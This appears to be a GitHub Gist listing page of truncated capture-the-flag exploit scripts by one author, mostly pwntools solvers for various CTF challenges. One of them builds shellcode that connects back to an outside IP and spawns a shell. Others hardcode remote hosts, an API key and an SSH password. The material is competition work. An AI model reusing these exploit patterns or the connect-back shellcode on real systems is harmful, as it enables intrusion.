
ujin5 / labyrinth.py
Last active July 10, 2017 04:12
sctf writeups
from pwn import *
def make(name,email,width,height,info,dat):
s.recvuntil('>')
s.sendline('1')
s.recvuntil('NAME>')
s.sendline(name)
s.recvuntil('EMAIL>')
s.sendline(email)
s.recvuntil('WIDTH>')
s.sendline(width)
ujin5 / solve.py
Created August 21, 2017 01:01
sctf 2017 report writeups
from pwn import *
import json
from ctypes import *
REMOTE = 1
if REMOTE == 1:
s = remote('report.eatpwnnosleep.com',55555)
a = {
'apikey' : "e54aa9929975face3253fb6e261f3a7c15701dface66a5a63ac2fdea555e745d",
}
ujin5 / readme.md
Last active November 7, 2017 15:16
HITCON 2017 Quals : Ragnarok Writeup

Ragnarok

1. Vulnerability

virtual void add_weapon(string str){
	if(weapon.empty()){
		weapon = str ;
 if(!weapon.compare("Droupnir")){
ujin5 / solve.py
Created November 20, 2017 03:09
kikikiki
from pwn import *
#s = remote('192.168.0.12',1234)
s =remote('10.10.134.127', 30004)
def add(name):
s.recvuntil('>>>')
s.sendline('1')
s.recvuntil('name')
s.send(name)
ujin5 / solve.py
Created November 20, 2017 03:09
kikikiki
from pwn import *
#s = remote('192.168.0.12',1234)
s =remote('10.10.134.127', 30004)
def add(name):
s.recvuntil('>>>')
s.sendline('1')
s.recvuntil('name')
s.send(name)
ujin5 / babysandbox.py
Last active July 15, 2018 22:02
meepwn 2018
from pwn import *
'''
this sandbox separate binary and unicorn engine.
So, add dependency code on binary, unicorn engine unintentional execute shellcode.
'''
a = asm("pop eax; sub eax, 0x90; call eax",arch='i386') # dependency code on binary . go back main func
a += "A"*(0x100-len(a)) # full buffer
sc = shellcraft.i386.linux.connect('108.61.200.86', 6051, 'ipv4')
#sc = shellcraft.i386.linux.connect('localhost', 6051, 'ipv4')
sc += shellcraft.i386.linux.findpeersh(6051)
ujin5 / smth.py
Created August 3, 2018 03:26
smth_revenge solution
'''
there is format string bug. howerever you only use %n,%c,%d because smth use custom printf.
by using %c you leak flag.
'''
from pwn import *
p = ssh("smth_chal","pwn2.task.ctf.codeblue.jp",password="whats_smth")
dat = "DbD: Dead by Daytime Sun lololo"
k = ""
table = [chr(i) for i in range(0x1f,0x80)]
ujin5 / exploit.html
Created June 24, 2019 00:03
Google CTF Quals 2019 Monochromatic
<html>
<pre id='log'></pre>
<script src="mojo_bindings.js"></script>
<script src="third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
<script src="being_creator_interface.mojom.js"></script>
<script src="food_interface.mojom.js"></script>
<script src="dog_interface.mojom.js"></script>
<script src="person_interface.mojom.js"></script>
<script src="cat_interface.mojom.js"></script>
<script>
ujin5 / multityped-array.py
Created August 17, 2019 13:56
whitehat 2019
from pwn import *
from ctypes import *
def convert(s):
    """Reinterpret an 8-byte little-endian buffer as an IEEE-754 double.

    Args:
        s: exactly 8 bytes (``struct`` raises ``struct.error`` for any
           other length).

    Returns:
        The float encoded by those bytes (``'<d'`` format).
    """
    (value,) = struct.unpack('<d', s)
    return value
#s = process("./pwnme")
s = remote("15.164.131.100",9988)
def r(dat):
    """Wait for the ">" prompt on the module-level connection ``s``, then send *dat* as one line."""
    conn = s
    conn.recvuntil(">")
    conn.sendline(dat)
ujin5 / babyllvm.py
Last active July 4, 2021 15:33
Codegate 2020 Quals
from pwn import *
#s = remote("0", 1234)
s = remote("58.229.240.181", 7777)
context.log_level = "debug"
s.recvuntil(">>>")
s.sendline("+[[."+"<"*0x8+"[.>]"+"<"*(0x6e+0x8)+"[.>]"+">"*(0x10-0x6)+"[,>]"+"<"*(0x6+0x10)+"[,>]"+">"*(0x80-0xe)+",>,<.]]")
base = u64(s.recvuntil("\x7f")[-6:]+"\x00\x00") - 0x201090
print "BASE @ " + hex(base)